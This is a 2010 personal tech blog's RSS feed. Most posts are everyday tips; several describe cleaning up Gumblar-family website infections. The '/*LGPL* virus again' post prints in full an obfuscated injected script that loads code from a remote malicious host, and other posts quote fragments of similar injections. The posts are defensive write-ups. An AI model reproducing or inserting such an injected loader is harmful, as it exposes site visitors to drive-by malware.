<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>envio land &#187; life</title>
	<atom:link href="http://a3-system.info/blog/category/daily-life/feed/" rel="self" type="application/rss+xml" />
	<link>http://a3-system.info/blog</link>
	<description>Ash Like Snow</description>
	<lastBuildDate>Fri, 27 Aug 2010 14:47:48 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>YET Another Gumblar</title>
		<link>http://a3-system.info/blog/php/yet-another-gumblar/</link>
		<comments>http://a3-system.info/blog/php/yet-another-gumblar/#comments</comments>
		<pubDate>Fri, 27 Aug 2010 14:47:48 +0000</pubDate>
		<dc:creator>envio</dc:creator>
				<category><![CDATA[life]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[web development]]></category>
		<category><![CDATA[Gumblar virus]]></category>
		<category><![CDATA[removal]]></category>

		<guid isPermaLink="false">http://a3-system.info/blog/?p=296</guid>
		<description><![CDATA[Today I have deal with my client to clean all chaos caused by Gumblar virus, It&#8217;s seem his root password was stolen and all web data infected with code. The virus code snippet is like this:
var D;if(D!='' &#38;&#38; D!='X'){D=''};var U=new Array();var p="";function u(){var aY=new Date();

The condition , all index file , index.html or index.php was [...]]]></description>
			<content:encoded><![CDATA[<p>Today I have deal with my client to clean all chaos caused by Gumblar virus, It&#8217;s seem his root password was stolen and all web data infected with code. The virus code snippet is like this:</p>
<pre name="code" class="js">var D;if(D!='' &amp;&amp; D!='X'){D=''};var U=new Array();var p="";function u(){var aY=new Date();
</pre>
<p>The condition , all index file , index.html or index.php was injected. The virus code injected on last line of file. After couple hour browse I didn&#8217;t find any solution to this problem and this make me confused, it will horrible if I have to remove the virus code one by one. </p>
<p>After two hour doing experiment finally I found the way how to remove the virus, just use bash script , using &#8220;grep&#8221; , &#8220;find&#8221; , &#8220;cut&#8221; , &#8220;grep&#8221; , &#8220;xargs&#8221; and &#8220;sed&#8221;. <img src='http://a3-system.info/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://a3-system.info/blog/php/yet-another-gumblar/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Silly SmartDav Autorun.inf Folder</title>
		<link>http://a3-system.info/blog/daily-life/silly-smartdav-autorun-inf-folder/</link>
		<comments>http://a3-system.info/blog/daily-life/silly-smartdav-autorun-inf-folder/#comments</comments>
		<pubDate>Thu, 15 Jul 2010 03:16:18 +0000</pubDate>
		<dc:creator>envio</dc:creator>
				<category><![CDATA[life]]></category>

		<guid isPermaLink="false">http://a3-system.info/blog/?p=277</guid>
		<description><![CDATA[When I plug my USB pen drive to my friend computer that SmartDav antivirus installed there, it will automatically create a autorun.inf folder and make some special directory there called &#8220;con&#8221; and on that directory it also create another directory called &#8220;Locked by SmartDav &#8230; bla &#8230; bla &#8230; bla&#8221;
The annoying  problem when I plug [...]]]></description>
			<content:encoded><![CDATA[<p>When I plug my USB pen drive to my friend computer that SmartDav antivirus installed there, it will automatically create a autorun.inf folder and make some special directory there called &#8220;con&#8221; and on that directory it also create another directory called &#8220;Locked by SmartDav &#8230; bla &#8230; bla &#8230; bla&#8221;</p>
<p>The annoying  problem when I plug my USB pen drive to my own computer with Avira antivirus installed, the Avira Active Guard seem scan the &#8220;autorun.inf&#8221; folder then Lock It.</p>
<p>When I want to eject my USB pen drive it can&#8217;t be done, It said my USB pen drive being used <img src='http://a3-system.info/blog/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> .  I think the the &#8220;special&#8221; folder created by SmartDav must be removed.</p>
<p>The special folder created by SmartDav can not delete using normal way, it will say &#8220;Can not find specific File&#8221; or &#8220;Invalid Parameter&#8221;.  After googling I found some trick how to remove it. Here the trick :</p>
<p>1. Open Command Promt</p>
<p>2. J:\&gt;rd /S \\.\j:\autorun\con\</p>
<p>&#8220;J&#8221;  is my USB pen drive and It will ask confirmation, hit &#8220;Y&#8221; to confirm then The autorun.inf folder and it sub folder will automatically deleted <img src='http://a3-system.info/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://a3-system.info/blog/daily-life/silly-smartdav-autorun-inf-folder/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Repeat as Header on MS Word not working</title>
		<link>http://a3-system.info/blog/daily-life/repeat-as-header-on-ms-word-not-working/</link>
		<comments>http://a3-system.info/blog/daily-life/repeat-as-header-on-ms-word-not-working/#comments</comments>
		<pubDate>Mon, 24 May 2010 02:31:36 +0000</pubDate>
		<dc:creator>envio</dc:creator>
				<category><![CDATA[fun stuff]]></category>
		<category><![CDATA[life]]></category>
		<category><![CDATA[Repeat as Header on MS Word not working]]></category>

		<guid isPermaLink="false">http://a3-system.info/blog/?p=273</guid>
		<description><![CDATA[Some time when you format some row as table header it didn&#8217;t work correctly, the solution is very easy,
1. select all your table , and right click, it will show table properties, click it !
2. then it will show table properties, click &#8220;table&#8221; tab on top of it.
3. change &#8220;text wrapping&#8221;  in to &#8220;none&#8221;
4. that&#8217;s [...]]]></description>
			<content:encoded><![CDATA[<p>Some time when you format some row as table header it didn&#8217;t work correctly, the solution is very easy,</p>
<p>1. select all your table , and right click, it will show table properties, click it !</p>
<p>2. then it will show table properties, click &#8220;table&#8221; tab on top of it.</p>
<p>3. change &#8220;text wrapping&#8221;  in to &#8220;none&#8221;</p>
<p>4. that&#8217;s it, you can select some row as your table header <img src='http://a3-system.info/blog/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://a3-system.info/blog/daily-life/repeat-as-header-on-ms-word-not-working/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Conficker Removal</title>
		<link>http://a3-system.info/blog/daily-life/conficker-removal/</link>
		<comments>http://a3-system.info/blog/daily-life/conficker-removal/#comments</comments>
		<pubDate>Fri, 19 Mar 2010 03:55:50 +0000</pubDate>
		<dc:creator>envio</dc:creator>
				<category><![CDATA[life]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Conficker Protect]]></category>
		<category><![CDATA[Conficker Protection]]></category>
		<category><![CDATA[Conficker Removal]]></category>

		<guid isPermaLink="false">http://a3-system.info/blog/?p=270</guid>
		<description><![CDATA[Last day I have successfully remove all conficker on from serveral Windows XP  computer. Those conficker must be the latest one because the computer has internet computer so it will update it self.
Method that I use is :
1. Unplug / terminate the local area connection.
2. Use rootkit detector to disable some svchost service infected by [...]]]></description>
			<content:encoded><![CDATA[<p>Last day I have successfully remove all conficker on from serveral Windows XP  computer. Those conficker must be the latest one because the computer has internet computer so it will update it self.</p>
<p>Method that I use is :</p>
<p>1. Unplug / terminate the local area connection.</p>
<p>2. Use rootkit detector to disable some svchost service infected by conficker</p>
<p>You can download the rootkit detector at <a href="http://www.gmer.net/.">http://www.gmer.net/</a> Run the rootkit detector software, if your computer has conficker on it it will detect some svchost service in red colour. You not need do full scan, just right click on red svchost service found by the rootkitdetector, and click <strong>disable service</strong>.</p>
<p>3. Use conficker removal software</p>
<p>Use this removal software from <a href="http://www.enigmasoftware.com/products/conficker-removal-tool/">http://www.enigmasoftware.com/products/conficker-removal-tool/</a> it very small tool, less than 200Kb software. Download and run the software. Follow the instruction. It need reboot few time.</p>
<p>4. Patch Your Windows with latest hotfix from microsoft to avoid conficker come again. Get the patch on</p>
<p><a href="http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx">http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx</a> . Download accourding you operating system.</p>
<p>That&#8217;s it</p>
]]></content:encoded>
			<wfw:commentRss>http://a3-system.info/blog/daily-life/conficker-removal/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Video Instruction for 7D user</title>
		<link>http://a3-system.info/blog/daily-life/video-instruction-for-7d-user/</link>
		<comments>http://a3-system.info/blog/daily-life/video-instruction-for-7d-user/#comments</comments>
		<pubDate>Wed, 10 Mar 2010 01:42:06 +0000</pubDate>
		<dc:creator>envio</dc:creator>
				<category><![CDATA[life]]></category>
		<category><![CDATA[canon 7D video instruction]]></category>

		<guid isPermaLink="false">http://a3-system.info/blog/?p=268</guid>
		<description><![CDATA[For Canon 7D user, canon has been released some video instruction. Check the video at :
http://www.usa.canon.com/dlc/controller?act=GetArticleAct&#38;articleID=3167
]]></description>
			<content:encoded><![CDATA[<p>For Canon 7D user, canon has been released some video instruction. Check the video at :</p>
<p><a href="http://www.usa.canon.com/dlc/controller?act=GetArticleAct&amp;articleID=3167">http://www.usa.canon.com/dlc/controller?act=GetArticleAct&amp;articleID=3167</a></p>
]]></content:encoded>
			<wfw:commentRss>http://a3-system.info/blog/daily-life/video-instruction-for-7d-user/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>/*LGPL* virus again (Gumblar Family)</title>
		<link>http://a3-system.info/blog/php/lgpl-virus-again-gumblar-family/</link>
		<comments>http://a3-system.info/blog/php/lgpl-virus-again-gumblar-family/#comments</comments>
		<pubDate>Mon, 25 Jan 2010 00:34:41 +0000</pubDate>
		<dc:creator>envio</dc:creator>
				<category><![CDATA[life]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[Gumblar virus]]></category>

		<guid isPermaLink="false">http://a3-system.info/blog/?p=250</guid>
		<description><![CDATA[After last virus attack , some my FTP account was stolen, my terrible mistake, I forgot change some of FTP password and the second attack come again after I clean it with virus removal from justcoded.com.
The second attact, the Java script code injected is not same as first one, it have some code variant , [...]]]></description>
			<content:encoded><![CDATA[<p>After last virus attack , some my FTP account was stolen, my terrible mistake, I forgot change some of FTP password and the second attack come again after I clean it with virus removal from justcoded.com.</p>
<p>The second attact, the Java script code injected is not same as first one, it have some code variant , The code I was found on my PHP and Javascript code is :</p>
<pre class="javascript">
&lt;script&gt;/*Exception*/ document.write('&lt;script src='+'h!&amp;&amp;t^^t#p&amp;(#^:$&amp;^^/&amp;@)/&amp;@@i!!$m@)a^#@g$!e($$)f@^a@&amp;p$&amp;$(-#c!o@!&amp;m^.&amp;h!!!a)t!$!e#n$#a!.!!&amp;&amp;n@e@!).$^$#j^@#^p@^(@.&amp;!&amp;s(!l#i@&amp;d#!e)$s@#h&amp;^a!!r!^e^-@$#n!(@e((t$&amp;#(.)s(u^(p@^!e!)r!)@)t!@&amp;r##u($^e^)l$#)i&amp;!&amp;f&amp;@^e^^.!^r)u^!$:@8@(0#@#!8#$!)0!)!/&amp;^)l&amp;e#&amp;(q(@^u#)!i!)p@(!e&amp;&amp;&amp;^.#!(f#!r)$!/^)l)&amp;@@e)#q^$@u@!!i#^(p$(e!^&amp;.#!f!r$&amp;/@v((k^@.(@c$@&amp;$o^!@m($/&amp;$g&amp;(@)o)!o(@&amp;!g$)!l!$e$$.)!c@$))o#@$^&amp;m@&amp;&amp;^/!p(&amp;c&amp;&amp;&amp;p#!)o#@#p@(.&amp;c#@!o$m$$&amp;/&amp;#!('.replace(/\)|@|\!|#|&amp;|\^|\(|\$/ig, '')+' defer=defer&gt;&lt;/scr'+'ipt&gt;');&lt;/script&gt;
&lt;!--2a2a37017f4e478abaa5f3c16a9b2656--&gt;
</pre>
<p>So I need to modify the cure file for this code variation, and it work fine. Recently I browse on justcode.com and see the new version on cure file it has have ability to cure variant Java Script code that injected to web file. So just try to download it <a href="http://justcoded.com/article/gumblar-family-virus-removal-tool/" target="_blank">here</a></p>
]]></content:encoded>
			<wfw:commentRss>http://a3-system.info/blog/php/lgpl-virus-again-gumblar-family/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Malware : /*LGPL*/ try{ window.onload</title>
		<link>http://a3-system.info/blog/daily-life/malware-lgpl-try-window-onload/</link>
		<comments>http://a3-system.info/blog/daily-life/malware-lgpl-try-window-onload/#comments</comments>
		<pubDate>Sun, 17 Jan 2010 05:12:21 +0000</pubDate>
		<dc:creator>envio</dc:creator>
				<category><![CDATA[life]]></category>
		<category><![CDATA[/*LGPL*/ try{ window.onload]]></category>
		<category><![CDATA[filezilla password stolen]]></category>
		<category><![CDATA[FTP password stolen]]></category>
		<category><![CDATA[FTP Virus]]></category>

		<guid isPermaLink="false">http://a3-system.info/blog/?p=243</guid>
		<description><![CDATA[This story happen when I visit a website, http://pa-malangkab.go.id, when I visit it , nothing happen actually, a weird thing happen tomorrow.
In the morning, I turn on my notebook and suddenly a message appear, &#8220;Security Tools&#8221; already installed on my computer, I didn&#8217;t feel install that software recently, but I know it was a spy [...]]]></description>
			<content:encoded><![CDATA[<p>This story happen when I visit a website, http://pa-malangkab.go.id, when I visit it , nothing happen actually, a weird thing happen tomorrow.</p>
<p>In the morning, I turn on my notebook and suddenly a message appear, &#8220;Security Tools&#8221; already installed on my computer, I didn&#8217;t feel install that software recently, but I know it was a spy ware or malware  software, then I use Malwarebytes (http://www.malwarebytes.org/mbam.php) to clean my notebook, and it work great, the malware was successfully cleaned.</p>
<p><img class="alignnone" title="Security Tool" src="http://farm5.static.flickr.com/4023/4239353356_2b1fb0c7e1.jpg" alt="" width="377" height="312" /></p>
<p>Accidentally I open my website work, and something bad happen, the website show nothing, I check the code and found some java script code injected to my PHP file. Then I think where the code came from ??</p>
<p>The java script code :</p>
<p><em>&lt;script&gt;/*LGPL*/ try{ window.onload = function(){var C1nse3sk8o41s = document.createElement(&#8217;s&amp;c^$#r))i($p@&amp;t^&amp;&#8217;.repl</em></p>
<p>After some investigation, I found that the malware infected my notebook steal my FTP , I am using Filezilla FTP client for my FTP activity. The Filezilla FTP client store some recent FTP session on &#8220;Quick Connect&#8221; feature, there 6 recent FTP session that stole from my notebook <img src='http://a3-system.info/blog/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' />  After get informasion from web, I know that filezilla is targeted by virus or malware, they like stole the FTP password. So I am will not use Filezilla again !!!!</p>
<p>After couple hour after malware infection, ton of my website file infected by javascript code. As a precautionary measure I change all FTP password listed on &#8220;Quick Connect&#8221; on Filezilla, from 6 website, I only can save 1, the last 5 website injected by malware : (</p>
<p>The file that injected by javascript code are  (in my case):</p>
<ol>
<li>index.php</li>
<li>index.html</li>
<li>.js file</li>
<li>file name that contain &#8220;home&#8221; &amp; &#8220;main&#8221;</li>
</ol>
<p>It was a lot job if manually remove the injected file, so I decide to find information how to remove injected javascript code. Finally I found a god man that write PHP code to remove javascript code ( Thanks alot <img src='http://a3-system.info/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  ), you can download the virus/javascript removal at http://justcoded.com/article/gumblar-family-virus-removal-tool/</p>
<p>So how this virus come to your computer ??? Here my personal analyze :</p>
<ol>
<li>We visit some infected website with some virus java script code.</li>
<li>Automatically it will run Java run time, then download a PDF file.</li>
<li>The PDF file is a modified PDF file that was injected by some code / virus, and exploit your acrobat reader</li>
<li>If your anti virus (My last AV is avast home edition) didn&#8217;t recognize the PDF file as virus, you will be infected.</li>
</ol>
<p>The prevention :</p>
<ol>
<li>Update your Anti virus (I decide to change my anti virus to Avira (http://www.free-av.com/)  free edition and it recognize the PDF file virus well)</li>
<li>Update your Acrobat Reader to latest version and disable the java script on your acrobat reader ( Edit &#8211; Preference &#8211; JavaScript &#8211; Un check  &#8220;Acrobat Java Script&#8221;</li>
<li>Not using Filezilla, unless you can disable &#8220;Quick Connect&#8221; feature</li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://a3-system.info/blog/daily-life/malware-lgpl-try-window-onload/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>XL Award 2009</title>
		<link>http://a3-system.info/blog/daily-life/xl-award-2009/</link>
		<comments>http://a3-system.info/blog/daily-life/xl-award-2009/#comments</comments>
		<pubDate>Wed, 30 Dec 2009 00:51:23 +0000</pubDate>
		<dc:creator>envio</dc:creator>
				<category><![CDATA[life]]></category>
		<category><![CDATA[XL Award 2009]]></category>

		<guid isPermaLink="false">http://a3-system.info/blog/?p=234</guid>
		<description><![CDATA[Sidiq Setyawan for XL award 2009 ^^
Kelak Aku Pake XL

Sudut Pasar

XL Shine

]]></description>
			<content:encoded><![CDATA[<p>Sidiq Setyawan for XL award 2009 ^^</p>
<p><strong>Kelak Aku Pake XL</strong></p>
<p><img class="alignnone" title="Anak XL" src="http://i510.photobucket.com/albums/s343/dikicy/anakXL_blog.jpg" alt="" width="450" height="318" /></p>
<p><strong>Sudut Pasar</strong></p>
<p><img class="alignnone" title="Sudut Pasar" src="http://i510.photobucket.com/albums/s343/dikicy/sudutpasar_blog.jpg" alt="" width="450" height="281" /></p>
<p><strong>XL Shine</strong></p>
<p><img class="alignnone" title="XL Shine" src="http://i510.photobucket.com/albums/s343/dikicy/xL-shine_blog.jpg" alt="" width="450" height="310" /></p>
]]></content:encoded>
			<wfw:commentRss>http://a3-system.info/blog/daily-life/xl-award-2009/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Facebook Time Zone &#8230;. could be a problem for a event</title>
		<link>http://a3-system.info/blog/daily-life/facebook-time-zone-could-be-a-problem-for-a-event/</link>
		<comments>http://a3-system.info/blog/daily-life/facebook-time-zone-could-be-a-problem-for-a-event/#comments</comments>
		<pubDate>Fri, 11 Dec 2009 01:04:14 +0000</pubDate>
		<dc:creator>envio</dc:creator>
				<category><![CDATA[life]]></category>
		<category><![CDATA[facebook time zone]]></category>

		<guid isPermaLink="false">http://a3-system.info/blog/?p=232</guid>
		<description><![CDATA[I just realize that time zone setting will affect in some facebook feature in this case for some &#8216;event&#8217;. As we subscribed to facebook, we didn&#8217;t set our local time zone in to our facebook account, so we are follow the &#8216;facebook&#8217; timezone, I am not sure what GMT the facebook time zone is it.
This [...]]]></description>
			<content:encoded><![CDATA[<p>I just realize that time zone setting will affect in some facebook feature in this case for some &#8216;event&#8217;. As we subscribed to facebook, we didn&#8217;t set our local time zone in to our facebook account, so we are follow the &#8216;facebook&#8217; timezone, I am not sure what GMT the facebook time zone is it.</p>
<p>This my real life example, when I am writing this post, it&#8217;s Friday December 11 2009, On facebook I have an event that has been finished yesterday (Thursday, December 10 2009 7.00 PM). On facebook notification, this event still informed today. I assume the Facebook time is still Thursday.</p>
]]></content:encoded>
			<wfw:commentRss>http://a3-system.info/blog/daily-life/facebook-time-zone-could-be-a-problem-for-a-event/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Windows requirement</title>
		<link>http://a3-system.info/blog/daily-life/windows-requirement/</link>
		<comments>http://a3-system.info/blog/daily-life/windows-requirement/#comments</comments>
		<pubDate>Sat, 05 Dec 2009 22:53:54 +0000</pubDate>
		<dc:creator>envio</dc:creator>
				<category><![CDATA[life]]></category>
		<category><![CDATA[Windows requirement]]></category>

		<guid isPermaLink="false">http://a3-system.info/blog/?p=230</guid>
		<description><![CDATA[It&#8217;s has been almost 9 year when I knew Microsoft Windows Operating system, I remembered when, the Microsoft windows 98 just need 200 Mb hard drive space, and now the newest Windows Operating system, windows 7 need at least 16 Gb , What a difference [--]a. Here the system requirement comparasion from windows 98, XP, [...]]]></description>
			<content:encoded><![CDATA[<p>It&#8217;s has been almost 9 year when I knew Microsoft Windows Operating system, I remembered when, the Microsoft windows 98 just need 200 Mb hard drive space, and now the newest Windows Operating system, windows 7 need at least 16 Gb , What a difference [--]a. Here the system requirement comparasion from windows 98, XP, then 7.</p>
<p>Windows 98</p>
<ul>
<li> 486DX-2/66 MHz or higher processor (Pentium processor recommended)</li>
<li> 16 MB of RAM (24 MB recommended, it&#8217;s possible to run on 8 MB machines with /im option used during the installation process)</li>
<li> At least 500 MB of space available on HDD. The amount of space required depends on the installation method and the components selected, but virtual memory and system utilities as well as drivers should be taken into consideration.</li>
<li>New installation (FAT32): 190-305 MB (typically 210 MB).</li>
</ul>
<p>Windows XP</p>
<ul>
<li>PC with 300 megahertz or higher processor clock speed recommended; 233 MHz minimum required (single or dual processor system);* Intel Pentium/Celeron family, or AMD K6/Athlon/Duron family, or compatible processor recommended</li>
<li>128 megabytes (MB) of RAM or higher recommended (64 MB minimum supported; may limit performance and some features)</li>
<li>1.5 gigabytes (GB) of available hard disk space</li>
</ul>
<p>Windows 7</p>
<ul>
<li>1 gigahertz (GHz) or faster 32-bit (x86) or 64-bit (x64) processor</li>
<li>1 gigabyte (GB) RAM (32-bit) or 2 GB RAM (64-bit)</li>
<li>16 GB available hard disk space (32-bit) or 20 GB (64-bit)</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://a3-system.info/blog/daily-life/windows-requirement/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
